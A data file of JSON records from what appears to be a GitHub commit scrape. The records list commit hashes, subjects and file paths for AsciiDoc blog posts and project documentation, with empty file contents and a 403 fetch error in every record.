{"commit":"a611a302cefae6b11eede18927ce0223503ea7fc","subject":"Update 2016-01-04-Managing-technical-debt-in-own-garage.adoc","message":"Update 2016-01-04-Managing-technical-debt-in-own-garage.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-01-04-Managing-technical-debt-in-own-garage.adoc","new_file":"_posts\/2016-01-04-Managing-technical-debt-in-own-garage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2229557859472d8bd3870a04ce4e5c141777fb46","subject":"Update 2016-12-06-problem-solving-Java.adoc","message":"Update 2016-12-06-problem-solving-Java.adoc","repos":"qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io","old_file":"_posts\/2016-12-06-problem-solving-Java.adoc","new_file":"_posts\/2016-12-06-problem-solving-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qeist\/qeist.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4dc49a18044cc544828854dfbe7127b35fe7817c","subject":"Update 2017-12-01-Christmas-Gift-Ideas.adoc","message":"Update 2017-12-01-Christmas-Gift-Ideas.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-01-Christmas-Gift-Ideas.adoc","new_file":"_posts\/2017-12-01-Christmas-Gift-Ideas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3358f60a5649bd0dfc98d75af4d1bc0eb29cdc09","subject":"Update 2018-02-26-make-book-manage-App.adoc","message":"Update 2018-02-26-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-26-make-book-manage-App.adoc","new_file":"_posts\/2018-02-26-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b74a1bfc9c5966c84d7510d90dcd1f380fc8a4c","subject":"Update 2019-01-31-draft-embedded-image.adoc","message":"Update 2019-01-31-draft-embedded-image.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2019-01-31-draft-embedded-image.adoc","new_file":"_posts\/2019-01-31-draft-embedded-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c95794539be92a5b81128880504f82a86058f7a","subject":"Initial logging docs","message":"Initial logging docs\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/logging-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/logging-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ccde9936610949f3de3705416d927a68cd3334a3","subject":"Added Stop EIP docs","message":"Added Stop EIP docs\n","repos":"nikhilvibhav\/camel,kevinearls\/camel,ullgren\/camel,kevinearls\/camel,jamesnetherton\/camel,pax95\/camel,apache\/camel,objectiser\/camel,curso007\/camel,gautric\/camel,onders86\/camel,tadayosi\/camel,snurmine\/camel,nikhilvibhav\/camel,curso007\/camel,dmvolod\/camel,pmoerenhout\/camel,tdiesler\/camel,gnodet\/camel,davidkarlsen\/camel,ullgren\/camel,DariusX\/camel,christophd\/camel,sverkera\/camel,nikhilvibhav\/camel,adessaigne\/camel,onders86\/camel,akhettar\/camel,zregvart\/camel,curso007\/camel,tdiesler\/camel,snurmine\/camel,sverkera\/camel,CodeSmell\/camel,apache\/camel,sverkera\/camel,zregvart\/camel,apache\/camel,dmvolod\/camel,gnodet\/camel,Fabryprog\/camel,apache\/camel,pax95\/camel,dmvolod\/camel,cunningt\/camel,alvinkwekel\/camel,cunningt\/camel,tadayosi\/camel,jonmcewen\/camel,jamesnetherton\/camel,alvinkwekel\/camel,mcollovati\/camel,christophd\/camel,gautric\/camel,jonmcewen\/camel,cunningt\/camel,anoordover\/camel,gautric\/camel,DariusX\/camel,jonmcewen\/camel,tdiesler\/camel,nikhilvibhav\/camel,pax95\/camel,sverkera\/camel,christophd\/camel,anoordover\/camel,Fabryprog\/camel,christophd\/camel,CodeSmell\/camel,alvinkwekel\/camel,christophd\/camel,pax95\/camel,adessaigne\/camel,gnodet\/camel,CodeSmell\/camel,snurmine\/camel,ullgren\/camel,cunningt\/camel,curso007\/camel,jamesnetherton\/camel,jamesnetherton\/camel,sverkera\/camel,jamesnetherton\/camel,anoordover\/camel,gnodet\/camel,jonmcewen\/camel,adessaigne\/camel,cunningt\/camel,anoordover\/camel,DariusX\/camel,snurmine\/camel,akhettar\/camel,gautric\/camel,anoordover\/camel,adessaigne\/camel,onders86\/camel,gautric\/camel,mcollovati\/camel,davidkarlsen\/camel,pmoerenhout\/camel,adessaigne\/camel,davidkarlsen\/camel,pmoerenhout\/camel,akhettar\/camel,gnodet\/camel,jamesnetherton\/camel,DariusX\/camel,kevinearls\/camel,Fabryprog\/camel,onders86\/camel,onders86\/camel,pax95\/camel,mcollovati\/camel,jonmcewen\/camel,snurmine\/camel,tdiesler\/camel,pmoerenhout\/camel,gautric\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,tdiesler\/camel,kevinearls\/camel,curso007\/camel,nicolaferraro\/camel,akhettar\/camel,pmoerenhout\/camel,pmoerenhout\/camel,onders86\/camel,pax95\/camel,cunningt\/camel,Fabryprog\/camel,dmvolod\/camel,zregvart\/camel,ullgren\/camel,tdiesler\/camel,punkhorn\/camel-upstream,christophd\/camel,apache\/camel,akhettar\/camel,akhettar\/camel,tadayosi\/camel,tadayosi\/camel,nicolaferraro\/camel,tadayosi\/camel,davidkarlsen\/camel,dmvolod\/camel,nicolaferraro\/camel,zregvart\/camel,dmvolod\/camel,objectiser\/camel,nicolaferraro\/camel,tadayosi\/camel,punkhorn\/camel-upstream,sverkera\/camel,mcollovati\/camel,snurmine\/camel,punkhorn\/camel-upstream,kevinearls\/camel,alvinkwekel\/camel,kevinearls\/camel,jonmcewen\/camel,objectiser\/camel,curso007\/camel,anoordover\/camel,objectiser\/camel,apache\/camel,adessaigne\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/stop-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/stop-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e69a1493586f26b52285c577aafd6aeed93622f","subject":"Update 2015-10-29-This-is-my-first-post.adoc","message":"Update 2015-10-29-This-is-my-first-post.adoc","repos":"gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io","old_file":"_posts\/2015-10-29-This-is-my-first-post.adoc","new_file":"_posts\/2015-10-29-This-is-my-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gruenberg\/gruenberg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9f0c45d6c0c606877495a3dc47b58e0fee00aac","subject":"add info","message":"add info\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/online\/2015-03-01-09-links.asciidoc","new_file":"content\/online\/2015-03-01-09-links.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"988ccc38c5b1f183c8497f596a91ca4bc5574858","subject":":memo: cVim","message":":memo: cVim\n","repos":"syon\/refills","old_file":"src\/refills\/chrome\/cvim.adoc","new_file":"src\/refills\/chrome\/cvim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a292a23de17cdf0f2543bc1d8ff5f9c884544640","subject":"fix goto commands documention in README","message":"fix goto commands documention in README\n","repos":"Asenar\/kakoune,danielma\/kakoune,flavius\/kakoune,Asenar\/kakoune,Somasis\/kakoune,danr\/kakoune,occivink\/kakoune,danielma\/kakoune,alexherbo2\/kakoune,rstacruz\/kakoune,mawww\/kakoune,alexherbo2\/kakoune,xificurC\/kakoune,xificurC\/kakoune,elegios\/kakoune,xificurC\/kakoune,alexherbo2\/kakoune,casimir\/kakoune,casimir\/kakoune,zakgreant\/kakoune,lenormf\/kakoune,danr\/kakoune,jjthrash\/kakoune,jkonecny12\/kakoune,danr\/kakoune,jkonecny12\/kakoune,flavius\/kakoune,ekie\/kakoune,flavius\/kakoune,elegios\/kakoune,Asenar\/kakoune,ekie\/kakoune,elegios\/kakoune,zakgreant\/kakoune,flavius\/kakoune,Somasis\/kakoune,danielma\/kakoune,alexherbo2\/kakoune,lenormf\/kakoune,alpha123\/kakoune,occivink\/kakoune,elegios\/kakoune,rstacruz\/kakoune,danielma\/kakoune,alpha123\/kakoune,casimir\/kakoune,jjthrash\/kakoune,casimir\/kakoune,jkonecny12\/kakoune,rstacruz\/kakoune,Asenar\/kakoune,xificurC\/kakoune,ekie\/kakoune,occivink\/kakoune,ekie\/kakoune,zakgreant\/kakoune,zakgreant\/kakoune,lenormf\/kakoune,mawww\/kakoune,jjthrash\/kakoune,jjthrash\/kakoune,mawww\/kakoune,lenormf\/kakoune,danr\/kakoune,alpha123\/kakoune,alpha123\/kakoune,occivink\/kakoune,Somasis\/kakoune,mawww\/kakoune,rstacruz\/kakoune,jkonecny12\/kakoune,Somasis\/kakoune","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"66e24383153af91638d102f2cbe12871a32e5730","subject":"Adding release notes for release of revapi_parent revapi_build_support revapi_build coverage revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin revapi_site","message":"Adding release notes for release of revapi_parent revapi_build_support revapi_build coverage revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin revapi_site\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20211006-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20211006-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"00f3146ae8d719f06836fc4150447870b63ccd4d","subject":"Update 2013-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","message":"Update 2013-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"_posts\/2013-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83fb65cbc33b9c65cabfd0259d7dd0428254fefe","subject":"Renamed '_posts\/2017-08-24-Test-Post.adoc' to '_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc'","message":"Renamed '_posts\/2017-08-24-Test-Post.adoc' to '_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc'","repos":"ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog","old_file":"_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","new_file":"_posts\/2017-08-24-Drools-workbench-and-Nexus-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ambarishpande\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb92350d774c7cfc5bea0ef3270e06f95ae963ea","subject":"Update 2015-06-27-Test.adoc","message":"Update 2015-06-27-Test.adoc","repos":"Le6ow5k1\/le6ow5k1.github.io,Le6ow5k1\/le6ow5k1.github.io,Le6ow5k1\/le6ow5k1.github.io","old_file":"_posts\/2015-06-27-Test.adoc","new_file":"_posts\/2015-06-27-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Le6ow5k1\/le6ow5k1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0e9719abd7ae9018def43c7f95ed493a077be24","subject":"Update 2015-10-29-Test.adoc","message":"Update 2015-10-29-Test.adoc","repos":"fgracia\/fgracia.github.io,fgracia\/fgracia.github.io,fgracia\/fgracia.github.io","old_file":"_posts\/2015-10-29-Test.adoc","new_file":"_posts\/2015-10-29-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fgracia\/fgracia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c78e55d05709a53e43453fefe854740dfe1a3e93","subject":"Update 2017-11-11-Dome.adoc","message":"Update 2017-11-11-Dome.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-11-11-Dome.adoc","new_file":"_posts\/2017-11-11-Dome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a98aa061acc13b2636769047e930cd9bb6d4035","subject":"docs: remove extraneous space","message":"docs: remove extraneous space\n\nChange-Id: I0a2d4b6b8e5e09affc4c1a239e3a61d4c58a72f8\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12906\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\n","repos":"helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6160ba65a126f69b91c69a3c77918a0f16f4fd35","subject":"Update 2015-02-27-push-State-state-Obj.adoc","message":"Update 2015-02-27-push-State-state-Obj.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2015-02-27-push-State-state-Obj.adoc","new_file":"_posts\/2015-02-27-push-State-state-Obj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96e754fe8327ac7a177294acb3a039da81528ca6","subject":"Update 2015-09-26-Sort-Algorithms-Summary.adoc","message":"Update 2015-09-26-Sort-Algorithms-Summary.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-Sort-Algorithms-Summary.adoc","new_file":"_posts\/2015-09-26-Sort-Algorithms-Summary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93812bf522d8658b0445d26deef0f37309b8aee5","subject":"Update 2016-04-02-ArduinoGenuino-Day-2016.adoc","message":"Update 2016-04-02-ArduinoGenuino-Day-2016.adoc","repos":"acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io","old_file":"_posts\/2016-04-02-ArduinoGenuino-Day-2016.adoc","new_file":"_posts\/2016-04-02-ArduinoGenuino-Day-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acien101\/acien101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83f57c1c4791534ddba241ec507e2a5ac7653af3","subject":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","message":"Update 2018-09-06-A-W-S-A-L-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_file":"_posts\/2018-09-06-A-W-S-A-L-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"429f181c7189bfb213c5b18b2d35a8264d0cb69a","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4504df693638d83b6d9c99707e5a9619fbe40d1a","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acf97688eddfb313bf242f406bc7f82c3501cb91","subject":"Update 2018-02-07-Screencasts-on-Linux-part-2.adoc","message":"Update 2018-02-07-Screencasts-on-Linux-part-2.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-02-07-Screencasts-on-Linux-part-2.adoc","new_file":"_posts\/2018-02-07-Screencasts-on-Linux-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3723e92465a24fc7aa51c716a6db2f16dde029e0","subject":"Update 2015-10-12-myblog.adoc","message":"Update 2015-10-12-myblog.adoc","repos":"mazongo\/mazongo.github.io,mazongo\/mazongo.github.io,mazongo\/mazongo.github.io","old_file":"_posts\/2015-10-12-myblog.adoc","new_file":"_posts\/2015-10-12-myblog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mazongo\/mazongo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60f7d1643b966a0d9406ba4dd1eb1b3eb5517705","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57a7e5e2464166b7684e619b4fa34e94d46771fe","subject":"Update 2016-04-06-Setting-up-the-Sonar-Qube.adoc","message":"Update 2016-04-06-Setting-up-the-Sonar-Qube.adoc","repos":"mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io,mrcouthy\/mrcouthy.github.io","old_file":"_posts\/2016-04-06-Setting-up-the-Sonar-Qube.adoc","new_file":"_posts\/2016-04-06-Setting-up-the-Sonar-Qube.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrcouthy\/mrcouthy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dae0f81938c9b49d90b5472fd3265fd87ec40a0","subject":"Update 2015-03-24-HTML-Button-mit-Klick-Effect-CSS-und-JavaScript.adoc","message":"Update 2015-03-24-HTML-Button-mit-Klick-Effect-CSS-und-JavaScript.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-03-24-HTML-Button-mit-Klick-Effect-CSS-und-JavaScript.adoc","new_file":"_posts\/2015-03-24-HTML-Button-mit-Klick-Effect-CSS-und-JavaScript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d6d22ccfeba70a741a4c87a517391fa4ef6ab10","subject":"Update 2016-11-06-Sunday.adoc","message":"Update 2016-11-06-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-06-Sunday.adoc","new_file":"_posts\/2016-11-06-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef2697a6df51f3943b0ba95cff11e3f97621c408","subject":"Revert \"Delete the file at '_posts\/2019-01-31-draft-embedded-image.adoc'\"","message":"Revert \"Delete the file at '_posts\/2019-01-31-draft-embedded-image.adoc'\"\n\nThis reverts commit eca754ecdc01727a10d785dacbe28ed168a1e707.\n","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2019-01-31-draft-embedded-image.adoc","new_file":"_posts\/2019-01-31-draft-embedded-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c71a012ba4ad39639d6ea420230fb5b63ba697b5","subject":"Update 2016-07-20-vim.adoc","message":"Update 2016-07-20-vim.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vim.adoc","new_file":"_posts\/2016-07-20-vim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f735c825b8ccf84aba4ae5bce7be50315cbeb699","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7503e3995cd891e2989c2086968915d52a8433eb","subject":"Update 2017-05-29-Migrate-Windows-VM-to-PVE.adoc","message":"Update 2017-05-29-Migrate-Windows-VM-to-PVE.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-05-29-Migrate-Windows-VM-to-PVE.adoc","new_file":"_posts\/2017-05-29-Migrate-Windows-VM-to-PVE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c031938f56f43af2d0a5ba291688453ddadd7969","subject":"Update 2020-05-19-ffmpeg-convert-mp3-to-wav.adoc","message":"Update 2020-05-19-ffmpeg-convert-mp3-to-wav.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2020-05-19-ffmpeg-convert-mp3-to-wav.adoc","new_file":"_posts\/2020-05-19-ffmpeg-convert-mp3-to-wav.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"965772e8eb4a4296ab1ffd7625a6b0ffea44d91a","subject":"tuned events section","message":"tuned events section\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80c923ed72cdb1b69290742a3bec379947707e86","subject":"Update 2017-02-11-Drawatchio.adoc","message":"Update 2017-02-11-Drawatchio.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-11-Drawatchio.adoc","new_file":"_posts\/2017-02-11-Drawatchio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca3324dc66fd0ec7aceef813f736ca4740482c01","subject":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","message":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c15d2bc428f2d2b248d36ab7b574d675d6cccf6c","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 